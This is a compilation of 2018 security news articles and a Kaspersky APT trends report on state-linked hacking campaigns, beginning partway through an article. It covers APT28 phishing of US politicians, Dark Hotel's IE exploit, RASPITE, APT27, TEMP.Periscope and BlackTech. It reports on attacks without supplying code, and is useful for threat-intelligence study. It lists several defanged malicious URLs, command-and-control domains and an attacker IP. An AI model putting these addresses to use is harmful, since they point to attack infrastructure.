At the time it is not possible to say if the fake attacks allowed the cyberspies to compromise the visitors’ machines, Microsoft’s post doesn’t mention any sinkhole investigation conducted by its experts.
Microsoft shut down dozens of other fake websites since 2016 after it has obtained the authorization from the authorities.
Experts believe that foreign states, especially Russia, will continue to attempt hacking into US politics and for this reason, Microsoft will continue to monitor any activity targeting US political groups and politicians.
“Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.” continues Microsoft.
In July, speaking at the Aspen Security Forum, Microsoft VP Tom Burt announced that the tech company uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates.
Microsoft blamed the Russian APT28 group for the attacks.
We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.
“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,”
The discovery made by Microsoft is part of the Microsoft’s Defending Democracy Program launched in April that is focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns.
Microsoft announced also its initiative AccountGuard that provides the following services to organizational and personal email accounts:
Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.
North Korea-linked Dark Hotel APT leverages CVE-2018-8373 exploit
20.8.2018 securityaffairs APT
The North Korea-linked Dark Hotel APT group is leveraging the recently patched CVE-2018-8373 vulnerability in the VBScript engine in attacks in the wild.
The vulnerability affects Internet Explorer 9, 10 and 11, it was first disclosed last month by Trend Micro and affected all supported versions of Windows.
The flaw could be exploited by remote attackers to take control of the vulnerable systems by tricking victims into viewing a specially crafted website through Internet Explorer. The attacker could also embed an ActiveX control marked ‘safe for initialization’ in an application or Microsoft Office document that hosts the IE rendering engine.
“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the security advisory published by Microsoft.
“An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”
The analysis of the exploit code for the CVE-2018-8373 revealed it shared the obfuscation technique implemented for another exploit triggering the CVE-2018-8174 flaw.
The CVE-2018-8174 was first discovered by experts at Chinese security company Qihoo 360 and it was fixed in May by Microsoft.
The similarities in the exploits suggest that were developed by the same threat actor.
“We found this exploit using heuristics, which led to a more in-depth analysis. Interestingly, we found that this exploit sample uses the same obfuscation technique as exploits for CVE-2018-8174, a VBScript engine remote code execution vulnerability patched back in May” wrote Trend Micro.
“We suspect that this exploit sample came from the same creator. Our analysis revealed that it used a new use-after-free (UAF) vulnerability in vbscript.dll, which remained unpatched in the latest VBScript engine.”
A similar theory was proposed by experts from Qihoo that collected evidence that linked the use of the CVE-2018-8373 exploit to Dark Hotel.
The experts discovered that domain name embedded in Office documents in latest attacks is the same used to download Double Kill exploit code in previous attacks linked to the North Korea-linked APT group.
“The 360 Threat Intelligence Center first obtained the IOC address after Trend Micro coding through the big data analysis association:
http://windows-updater[.]net/realmuto/wood[.]php?who=1??????
Associated homologous 0day attack sample” states Qihoo
“And found an attack time and trend technology found in the wild “double kill” 0day attack on the same day suspected of using the 0day attack of the office document sample, the domain name embedded in the Offce document sample and the domain name format given by Trend Micro (http ://windows-updater[.]net/stack/ov[.]php?w= 1\x00who =1)”
In the analysis published in May by Qihoo 360 the researchers associated the CVE-2018-8373 exploit with Dark Hotel based on TTPs associated with the threat actor (e.g. the decryption algorithm that malware used is identical to Dark Hotel’s one).
Experts speculated that the CVE-2018-8373 was used in a cyber espionage campaign aimed at China.
Alleged Iran-linked APT group RASPITE targets US electric utilities
3.8.2018 securityaffairs APT
According to Dragos firm, the RASPITE cyber-espionage group (aka Leafminer) has been targeting organizations in the United States, Europe, Middle East, and East Asia.
Researchers from security firm Dragos reported that a group operating out of Iran tracked as RASPITE has been targeting entities in the United States, Europe, Middle East, and East Asia, industrial cybersecurity firm Dragos warns.
The group has been active at least since 2017, researchers uncovered operations aimed at government and other types of organizations in the Middle East.
“Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE.” read a blog post published by Dragos.
“Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time.”
Last week, experts from Symantec who tracked the group as Leafminer published a detailed report on the activity of the cyber espionage team who leveraged both custom-built malware and publicly-available tools in observed campaigns.
According to Symantec, the extent of the campaigns conducted by the group could be wider, the researchers uncovered a list, written in Iran’s Farsi language, of 809 targets whose systems were scanned by the attackers.
The list groups each entry with organization of interest by geography and industry, in includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.
Now researchers from Dragos confirmed that the RASPITE is behind attacks that has been targeting industrial control systems in several states.
According to the experts, the hackers also accessed operations in the electric utility sector in the United States.
The hackers carry on watering hole attacks leveraging compromised websites providing content of interest for the potential victims.
RASPITE attacks appear similar to the ones conducted by other threat actors like DYMALLOY and ALLANITE, the hackers injected in the websites links to a resource to prompt an SMB connection with the intent to gather Windows credentials.
Then, the attackers deploy scripts to install a malware that connects to C&C ad give then attacker the control of the compromised machine.
According to Dragos, even if RASPITE has mainly focused on ICS systems, at the time there is no news about destructive attacks on such kind of devices.
“RASPITE’s activity to date currently focuses on initial access operations within the electric utility sector. Although focused on ICS-operating entities, RASPITE has not demonstrated an ICS-specific capability to date.” continues Dragos.
“This means that the activity group is targeting electric utilities, but there is no current indication the group has the capability of destructive ICS attacks including widespread blackouts like those in Ukraine.”
Sergio Caltagirone, Director of Threat Intelligence, Dragos, explained that his firm provided only limited information on the activity of the group to avoid “proliferation of ideas or tradecraft to other activity groups.”
Russian APT28 espionage group targets democratic Senator Claire McCaskill
28.7.2018 securityaffairs APT
The Russia-linked APT28 group targets Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.
The Russian APT group tracked as Fancy Bear (aka APT28, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM), that operated under the Russian military agency GRU, continues to target US politicians.
This time the target is Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.
The news was reported by The Daily Beast, McCaskill always expressed criticism of Russia and its aggressive strategy in the cyberspace. McCaskill has repeatedly accused the Russian Government of “cyber warfare against our democracy,” she defined President Vladimir Putin as a “thug” and a “bully.”
Russian cyberspies launched spear-phishing attacks against the member of the staff aimed at stealing their credentials, a tactic already used against Hillary Clinton campaign manager John Podesta in 2016.
The phishing messages contained fake notifications instructing the victims to change their Microsoft Exchange passwords.
“The attempt against McCaskill’s office was a variant of the password-stealing technique used by Russia’s so-called “Fancy Bear” hackers against Clinton’s campaign chairman, John Podesta, in 2016.” reads the report published by The Daily Beast.
“The hackers sent forged notification emails to Senate targets claiming the target’s Microsoft Exchange password had expired, and instructing them to change it. If the target clicked on the link, he or she was taken to a convincing replica of the U.S. Senate’s Active Directory Federation Services (ADFS) login page, a single sign-on point for e-mail and other services.”
In July, Microsoft helped the US Government is protecting at least three 2018 midterm election candidates from attacks of Russian cyberspies.
The hackers sent spear-phishing messages to the candidates, the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.
“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.
“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”
Once Microsoft discovered the phishing website it has taken down it and helped the US government to “avoid anybody being infected by that particular attack.”
“In October, Microsoft wrested control of one of the spoofed website addresses—adfs.senate.qov.info. Seizing the Russians’ malicious domain names has been easy for Microsoft since August 2017, when a federal judge in Virginia issued a permanent injunction against the GRU hackers, after Microsoft successfully sued them as unnamed “John Doe” defendants.” continues the report.
Microsoft made sinkholing of the website, in this way it was able to track victims of the attacks that were redirected to the phishing attack.
The Daily Beast identified McCaskill as a target while investigating statements made by Microsoft VP Tom Burt during his speech at the Aspen Security Forum.
Microsoft attributed the attacks to Russian APT28 group.
McCaskill released a statement confirming that cyberattack was unsuccessful.
“Russia continues to engage in cyber warfare against our democracy. I will continue to speak out and press to hold them accountable,” McCaskill said.
“While this attack was not successful, it is outrageous that they think they can get away with this. I will not be intimidated. I’ve said it before and I will say it again, Putin is a thug and a bully.”
DHS – Russian APT groups are inside US critical infrastructure
24.7.2018 securityaffairs APT
The US Government is warning of continuous intrusions in National critical infrastructure and it is blaming the Kremlin for the cyber attacks.
According to the US Department of Homeland Security, Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and are still targeting them.
These attacks could have dramatic consequence, an attack against a power grid could cause a massive power outage.
It isn’t a sci-fi, it has already happened in Ukraine and security experts blamed Russian APT groups tracked as Dragonfly and Energetic Bear.
According to the government experts, hackers were able to penetrate also air-gapped networks.
The Wall Street Journal quoted Homeland Security officials reporting various attacks.
“Hackers working for Russia claimed “hundreds of victims” last year in a long-running campaign that put them inside the control rooms of U.S. electric utilities where they could have caused blackouts, federal officials said.” states the WSJ.
The officials sustain that the Energetic Bear APT has already penetrated “hundreds” of systems in national power grids.
The DHS issued several alerts related to the APT attacks and shared technical details about their TTPs, including Indicators of Compromise (IOCs) to detect their presence in the IT infrastructure.
Cyber intrusions of critical infrastructure are part of long-term information warfare strategy.
Russians APT Groups carried out spear-phishing attacks against utilities’ equipment vendors and sub subtractors to gather intelligence and collect information to penetrate the infrastructure.
Hackers aim at the exploitation of the accesses into the utilities used by equipment makers and suppliers for ordinary maintenance and telemetry. Their accesses could allow them to deploy malware into the facilities.
Unfortunately, the attacks are still ongoing, many critical infrastructure are operated by private companies with pour cyber hygiene.
Unfortunately, in many cases, the operators totally ignore the presence of the attackers into their networks.
“They got to the point where they could have thrown switches,” Jonathan Homer, chief of industrial control system analysis for Homeland Security, told the paper.
CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing
23.7.2018 securityaffairs APT
Researchers at CSE Cybsec ZLab analyzed a malicious code involved in a long-term espionage campaign in Syria attributed to Chinese APT27 group.
A few days ago, the security researcher Lukas Stefanko from ESET discovered an open repository containing some Android applications.
The folder was found on a compromised website at the following URL:
hxxp://chatsecurelite.uk[.]to
This website is written in Arabic language and translating its content it seems to offer a secure messaging app. The homepage shows how the application works and includes some slides about it.
Security researchers from CSE Cybsec Z-Lab analyzed the content of the folder and discovered an Android spyware that was developed to exfiltrate sensitive information from victims’ devices.
The malicious code was used to compromise entities in the area, the researchers discovered that it was part or the arsenal of a Chinese APT group tracked as APT27, aka Golden Rat Organization.
The APT27 group focused its activity in Syria in the last couple of years, it used both Windows and Android malware to compromise target devices. Its code was not so sophisticated, anyway, the activity of the group is still ongoing.
Searching online we have found only one team of researchers that tracked the activity of the APT27 group in Syria since 2016, it was a group of researchers at 360 Threat Intelligence Center.
The analysis published by the team revealed the activity of the APT27 in Syria, the code analyzed by malware analysts at Zlab at CSE Cybsec and the one dissected by 360 Threat Intelligence Center is quite identical.
The 360 Threat Intelligence Center is dated 2017, the experts at CSE Cybsec collected evidence that the cyber espionage is still ongoing and that the threat actor continues to improve its malicious code.
Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.
Update CSE Malware ZLab – Operation Roman Holiday – Hunting the Russian APT28
19.7.2018 securityaffairs APT
Researchers from the Z-Lab at CSE Cybsec analyzed a new collection of malware allegedly part of a new espionage campaign conducted by the APT28 group.
It was a long weekend for the researchers from the Z-Lab at CSE Cybsec that completed the analysis a number of payloads being part of a new cyber espionage campaign conducted by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium).
Last time experts attributed an ongoing campaign to APT28 was in June, when experts from Palo Alto Networks noticed that the group was using new tools in a recent string of attacks.
Palo Alto Networks explained t the APT group has shifted focus in their interest, from NATO member countries and Ukraine to towards the Middle East and Central Asia.
The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.
While conducting ordinary threat intelligence activities, experts at Z-Lab at CSE Cybsec have recently discovered a new series of malware samples that were submitted to the major online sandboxes.
In particular, they noticed a malware sample submitted to Virus Total that was attributed by some experts to the Russian APT28 group.
The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.
With the help of the researcher that goes online with the Twitter handle Drunk Binary (@DrunkBinary) researchers from Z-Lab obtained a collection of samples to compare with the one that was uploaded on VirusTotal platform.
The analysis revealed that it was a new variant of the infamous APT28 backdoor tracked as X-Agent, in particular, a new Windows version that appeared in the wild in June,
The attack analyzed CSE Cybsec is multi-stage, the experts discovered an initial dropper malware written in Delphi programming language (a language used by the APT28 group in other campaigns) downloads a second stage payload from the Internet and executes it.
The payload communicates to the server using HTTPS protocol, making it impossible to eavesdrop on the malicious traffic it generates.
The experts also analyzed another malicious DLL, apparently unrelated to the previous samples, that presents many similarities with other payloads attributed to the Russian APT group.
This malware immediately caught the attention of the expert because it contacts a C2 with the name “marina-info.net” a clear reference to the Italian Military corp, Marina Militare. This lead them into believing that the malicious code was developed as part of targeted attacks against the Italian Marina Militare, or some other entities associated with it.
This last DLL seems to be completely unconnected with the previous samples, but further investigation leads the experts into believing that it was an additional component used by APT28 in this campaign to compromise the target system.
APT28 has a rich arsenal composed of a large number of modular malware and the dll is the component of the X-Agent dissected by the Z-Lab.
X-Agent is a persistent payload injected into the victim machine that can be compiled for almost any Operating System and can be enhanced by adding new ad-hoc component developed for the specific cyber-attack.
In this case, the component was submitted to online sandboxes while the new campaign was ongoing. The experts cannot exclude that the APT group developed the backdoor to target specific organizations including the Italian Marina Militare or any other subcontractor. In their analysis, the experts were not able to directly connect the malicious dll file to the X-Agent samples, but they believe they are both parts of a well-coordinated surgical attack powered by APT28 tracked by Z-Lab as Roman Holiday because it targeted Italian organizations in the summertime.
The dll that connect to “marina-info.net” might be the last stage-malware that is triggered only when particular conditions occur, for example when the malware infects a system with an IP address belonging to specific ranges.
Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.
APT Trends Report Q2 2018
19.7.2018 Kaspersky APT
In the second quarter of 2017, Kaspersky Lab’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports, in an effort to make the public aware of the research we have been conducting. This report serves as the latest installment, focusing on the relevant activities that we observed during Q2 2018.
These summaries are a representative snapshot of what has been discussed in greater detail in our private reports. They aim to highlight the significant events and findings that we feel people should be aware of. For brevity’s sake, we are choosing not to publish indicators associated with the reports highlighted. However, readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact: intelreports@kaspersky.com.
Remarkable new findings
We are always interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. Q2 2018 was very interesting in terms of APT activity, with a remarkable campaign that reminds us how real some of the threats are that we have been predicting over the last few years. In particular, we have warned repeatedly how ideal networking hardware was for targeted attacks, and that we had started seeing the first advanced sets of activity focusing on these devices.
In terms of well-known groups, Asian actors were the most active by far.
Lazarus/BlueNoroff was suspected of targeting financial institutions in Turkey as part of a bigger cyberespionage campaign. The same actor was also suspected of a campaign against an online casino in Latin America that ended in a destructive attack. Based on our telemetry, we further observed Lazarus targeting financial institutions in Asia. Lazarus has accumulated a large collection of artefacts over the last few years, in some cases with heavy code reuse, which makes it possible to link many newly found sets of activity to this actor. One such tool is the Manuscrypt malware, used exclusively by Lazarus in many recent attacks. The US-CERT released a warning in June about a new version of Manuscrypt they call TYPEFRAME.
Even if it is unclear what the role of Lazarus will be in the new geopolitical landscape, where North Korea is actively engaged in peace talks, it would appear that financially motivated activity (through the BlueNoroff and, in some cases, the Andariel subgroup) continues unabated.
Possibly even more interesting is the relatively intense activity by Scarcruft, also known as Group123 and Reaper. Back in January, Scarcruft was found using a zero-day exploit, CVE-2018-4878 to target South Korea, a sign that the group’s capabilities were increasing. In the last few months, the use of Android malware by this actor has been discovered, as well as a new campaign where it spreads a new backdoor we call POORWEB. Initially, there was suspicion that Scarcruft was also behind the CVE-2018-8174 zero day announced by Qihoo360. We were later able to confirm the zero day was actually distributed by a different APT group, known as DarkHotel.
The overlaps between Scarcruft and Darkhotel go back to 2016 when we discovered Operation Daybreak and Operation Erebus. In both cases, attacks leveraged the same hacked website to distribute exploits, one of which was a zero day. We were later able to separate these as follows:
Operation Exploit Actor
Daybreak CVE-2016-4171 DarkHotel
Erebus CVE-2016-4117 Scarcruft
DarkHotel’s Operation Daybreak relied on spear-phishing emails predominantly targeting Chinese victims with a Flash Player zero day. Meanwhile, Scarcruft’s Operation Erebus focused primarily on South Korea.
Analysis of the CVE-2018-8174 exploit used by DarkHotel revealed that the attacker was using URLMoniker to invoke Internet Explorer through Microsoft Word, ignoring any default browser preferences on the victim’s computer. This is the first time we have observed this. It is an interesting technique that we believe may be reused in future for different attacks. For more details check our Securelist Blog: “The King is Dead. Long Live the King!“.
We also observed some relatively quiet groups coming back with new activity. A noteworthy example is LuckyMouse (also known as APT27 and Emissary Panda), which abused ISPs in Asia for waterhole attacks on high profile websites. We wrote about LuckyMouse targeting national data centers in June. We also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China.
Still, the most notable activity during this quarter is the VPNFilter campaign attributed by the FBI to the Sofacy and Sandworm (Black Energy) APT groups. The campaign targeted a large array of domestic networking hardware and storage solutions. It is even able to inject malware into traffic in order to infect computers behind the infected networking device. We have provided an analysis on the EXIF to C2 mechanism used by this malware.
This campaign is one of the most relevant examples we have seen of how networking hardware has become a priority for sophisticated attackers. The data provided by our colleagues at Cisco Talos indicates this campaign was at a truly global level. We can confirm with our own analysis that traces of this campaign can be found in almost every country.
Activity of well-known groups
It seems that some of the most active groups from the last few years have reduced their activity, although this does not mean they are less dangerous. For instance, it was publicly reported that Sofacy started using new, freely available modules as last stagers for some victims. However, we observed how this provided yet another innovation for their arsenal, with the addition of new downloaders written in the Go programming language to distribute Zebrocy.
There is possibly one notable exception to this supposed lack of activity. After the Olympic Destroyer campaign last January against the Pyeongchang Winter Olympic games, we observed new suspected activity by the same actor (we tentatively called them Hades) in Europe. This time, it seems the targets are financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.
But even more interesting is the resemblance between the TTPs and OPSEC of the Olympic Destroyer set of activity and those of Sofacy. Olympic Destroyer is a master of deception, so this may be yet another false flag, but so far we connect, with low to medium confidence, the Hades group activity to Sofacy.
One of the most interesting attacks we detected was an implant from Turla (attributed to this actor with medium confidence) that we call LightNeuron. This new artefact directly targets Exchange Servers and uses legitimate standard calls to intercept emails, exfiltrate data and even send mails on behalf of the victims. We believe this actor has been using this technique since maybe as early as 2014, and that there is a version affecting Unix servers running Postfix and Sendmail. So far we have seen victims of this implant in the Middle East and Central Asia.
Newcomers and comebacks
Every now and then, we are surprised to see old actors that have been dormant for months or even years distributing new malware. Obviously, this may be caused by a lack of visibility, but regardless of that, it indicates that these actors are still active.
One good example would be WhiteWhale, an actor that has been extremely quiet since 2016. We detected a new campaign last April where the actor was distributing both the Taidoor and Yalink malware families. This activity was almost exclusively targeting Japanese entities.
Following the intense diplomatic activity around the North Korea peace talks and the subsequent summit with the U.S. president in Singapore, Kimsuky decided to take advantage of this theme to distribute its malware in a new campaign. A massive update to its arsenal in late 2017 and early 2018 was mobilized in a new wave of spear-phishing emails.
We also discovered a new low-sophistication set of activity we call Perfanly, which we couldn´t attribute to any known actor. It has been targeting governmental entities in Malaysia and Indonesia since at least 2017. It uses custom multistage droppers as well as freely available tools such as Metasploit.
Between June and July, we observed a battery of attacks against various institutions in Kuwait. These attacks leverage Microsoft Office documents with macros, which drop a combination of VBS and Powershell scripts using DNS for command and control. We have observed similar activity in the past from groups such as Oilrig and Stonedrill, which leads us to believe the new attacks could be connected, though for now that connection is only assessed as low confidence.
Final thoughts
The combination of simple custom artefacts designed mainly to evade detection, with publicly available tools for later stages seems to be a well-established trend for certain sets of activity, like the ones found under the ‘Chinese-speaking umbrella’, as well as for many newcomers who find the entry barrier into APT cyberespionage activity non-existent.
The intermittent activity by many actors simply indicates they were never out of business. They might take small breaks to reorganize themselves, or to perform small operations that might go undetected on a global scale. Probably one of the most interesting cases is LuckyMouse, with aggressive new activity heavily related to the geopolitical agenda in Asia. It is impossible to know if there is any coordination with other actors who resurfaced in the region, but this is a possibility.
One interesting aspect is the high level of activity by Chinese-speaking actors against Mongolian entities over the last 10 months. This might be related to several summits between Asian countries – some related to new relations with North Korea – held in Mongolia, and to the country’s new role in the region.
There were also several alerts from NCSC and US CERT regarding Energetic Bear/Crouching Yeti activity. Even if it is not very clear how active this actor might be at the moment (the alerts basically warned about past incidents), it should be considered a dangerous, active and pragmatic actor very focused on certain industries. We recommend checking our latest analysis on Securelist because the way this actor uses hacked infrastructure can create a lot of collateral victims.
To recap, we would like to emphasize just how important networking hardware has become for advanced attackers. We have seen various examples during recent months and VPNFilter should be a wake-up call for those who didn’t believe this was an important issue.
New Attacks on Palestine Linked to 'Gaza Cybergang'
12.7.2018 securityweek APT
The Gaza Cybergang, an advanced persistent threat (APT) group linked to the Palestinian terrorist organization Hamas, apparently continues to target organizations in the Middle East, researchers at Check Point revealed last week.
The attacks observed by the security firm started with a spear-phishing email carrying a self-extracting archive that stored a Word document and a malicious executable. The emails purported to come from the Palestinian Political and National Guidance Commission and the documents contained copies of media reports from various Palestinian news websites.
While the targeted user is busy looking at the document, a piece of malware is being installed on their system. The malware, an upgraded variant of Micropsia, a tool previously linked to the Gaza Cybergang, is capable of taking screenshots, stealing documents, rebooting the system, obtaining information about the compromised device, and killing itself.
These and other capabilities are provided by more than a dozen modules, each named after characters in the American TV show “The Big Bang Theory” and a popular Turkish TV series called “Resurrection: Ertugrul.” In a related malware sample, the modules are named after various BMW car models (e.g. BMW_x1, BMW_x8).
The main target of this campaign, which Check Point has dubbed “Big Bang,” appears to be the Palestinian Authority, the governing body of the emerging Palestinian autonomous regions of the West Bank and Gaza Strip.
Researchers believe the latest attacks started in March and evidence suggests that they could be the work of the Gaza Cybergang, which has been known to target the Palestinian Authority many times in the past years.
“Although the group behind it seems to be focused on carefully selecting their victims, using a custom-made info-stealer for intelligence gathering operations, due to its very nature it is difficult to assert what the ultimate goal of this campaign is. Indeed, the next stages of the attack may even still be in the works, not yet deployed or only deployed to selected few victims,” Check Point researchers wrote in a blog post.
Also known as Gaza Hackers Team and Molerats, the threat actor has been active since at least 2012. Its targets include Israel, Egypt, Saudi Arabia, the UAE, Iraq, the United States, and some European countries.
The group has occasionally suspended activity after security firms exposed its operations, but it has continued improving tools and techniques and expanding its list of targets.
One of the most recent reports on Gaza Cybergang was published in October 2017 by Kaspersky Lab. The security firm reported at the time that the group had been targeting organizations in the Middle East and North Africa (MENA) region, including an oil and gas company from which the hackers stole information for more than a year.
Cisco Talos also published a report on Gaza Cybergang last year, detailing attacks aimed at Palestinian law enforcement.
China-based TEMP.Periscope APT targets Cambodia’s elections
12.7.2018 securityaffairs APT
FireEye uncovered a large-scale Chinese phishing and hacking campaign powered by Temp.periscope APT aimed at Cambodia’s elections.
Security researchers at FireEye have uncovered a large-scale Chinese phishing and hacking campaign aimed at Cambodia’s elections.
The hackers distributed a remote access trojan (RAT) and data exfiltration operation targeting the poll.
The experts from FireEye attributed the attacks to an APT group tracked as TEMP.Periscope that targeted in past operations American engineering and maritime operations.
FireEye found evidence of infection on systems used by election-related entities in Cambodia, including the National Election Commission, human rights advocates, an MP for the Cambodia National Rescue Party, two Cambodian diplomats in overseas posts, and some media outlets.
“FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia’s politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures.” reads the analysis published by FireEye.
“This campaign occurs in the run up to the country’s July 29, 2018, general elections.”
TEMP.Periscope used the same infrastructure of other campaigns against other targets, including the defense industrial base in the United States and a chemical company based in Europe.
Analyzing this campaign, FireEye found files on three open indexes operated by the attackers, in this way the company gathered information about group’s TTPs and its targets. The activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia’s government and elections.
Two servers (chemscalere[.]com and scsnewstoday[.]com) is used to operate a typical Command and Control infrastructure and hosting sites, while a third one, mlcdailynews[.]com, works as an active SCANBOX server.
SCANBOX is another APT that FireEye has monitored in various campaigns since 2015, the presence of a SCANBOX server suggested TEMP.Periscope was also planning to target individuals with an interest in US-East Asia politics, Russia, and NATO affairs in forthcoming campaigns.
The servers contain both malware and logs, the analysis of the latter revealed:
Analysis of logs from the three servers revealed:
Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .
Cambodia TEMP.Periscope
The servers were administered by operators based in Hainan (one of the IP addresses, 112.66.188[.]28, is located in Hainan, China), and experts found two new malware families hosted on them, DADBOD and EVILTECH, and other malware families detected in the past (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX)”.
The most active tolls of this campaign were the AIRBREAK backdoor, the HOMEFRY password cracker and dumper; the LUNCHMONEY uploader and a command line reconnaissance tool called MURKYTOP.
FireEye says it had seen these in previous campaigns, and it also spotted two new tools in the Cambodian operation. There’s a backdoor called EVILTECH, a Javascript-based RAT, and the DADBOD credential stealer.
Malware Function Details
EVILTECH Backdoor
EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.
DADBOD Credential Theft
DADBOD is a tool used to steal user cookies.
Analysis of this malware is still ongoing.
The experts attributed the attacks to China, other IP addresses involved in the campaign are associated with virtual private servers, but researchers noticed that artifacts indicate that the computers used to log in all cases are configured with Chinese language settings.
“The activity uncovered here offers new insight into TEMP.Periscope’s activity.” concludes FireEye. “Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections”
BlackTech APT using stolen D-Link certificates to spread malware
11.7.2018 securityaffairs APT
A cyber-espionage group tracked as BlackTech is abusing code-signing certificates stolen from D-Link for the distribution of their malware.
Security experts from ESET discovered that an APT group tracked as BlackTech is using code-signing certificates stolen from Taiwanese-based tech firm D-Link and the security company Changing Information Technology Inc.
According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.
The attackers used the certificates to sign the code of the Plead backdoor that has been in the wild since at least 2012.
The Plead backdoor was used by threat actors to exfiltrate confidential documents from Taiwanese government agencies and private organizations.
“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate.” reads the analysis published by ESET.
“The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen.”
ESET reported the abuses to the D-Link that revoked two certificates on July 3 and informed its customers that most of them should not be affected by the revocation.
“D-Link recently discovered that two of its code signing certificates were misappropriated. Upon discovery, we immediately decommissioned the certificates and investigated the issue.” reads the advisory published by D-Link.
“Like several other companies in Asia, D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong. The two affected D-Link certificates were revoked, effective July 3rd, 2018. New certificates have been issued to resolve this problem.”
Taiwan-based Changing Information Technology Inc. revoked the abused certificate on July 4, but according to ESET, the hackers continued to use it to spread the malware.
ESET identified two different malware families that were abusing the stolen certificate, the Plead backdoor, and a related password stealer component that could gather saved passwords from Google Chrome, Microsoft Internet Explorer, Microsoft Outlook, and Mozilla Firefox.
The signed Plead backdoor are highly obfuscated with junk code, it was used to download from a remote server or opens from the local disk a small encrypted binary blob. This blob includes an encrypted shellcode that downloads the final Plead backdoor module.
Why do the attackers steal digital certificates?
Attackers use to sign the malicious code with digital certificates in the attempt to make the malware appearing like legitimate applications bypassing security measures.
The most popular case of a malware abusing code-signing certificates was the Stuxnet worm, that misused digital certificates stolen from RealTek and JMicron.
Iranian Charming Kitten ATP group poses as Israeli cybersecurity firm in phishing campaign
3.7.2018 securityaffairs APT
Iranian APT groups continue to very active, recently Charming Kitten cyber spies attempted to pose as an Israeli cyber-security firm that uncovered previous hacking campaigns.
The Iranian Charming Kitten ATP group, aka Newscaster or Newsbeef, launched spear phishing attacks against people interested in reading reports about it.
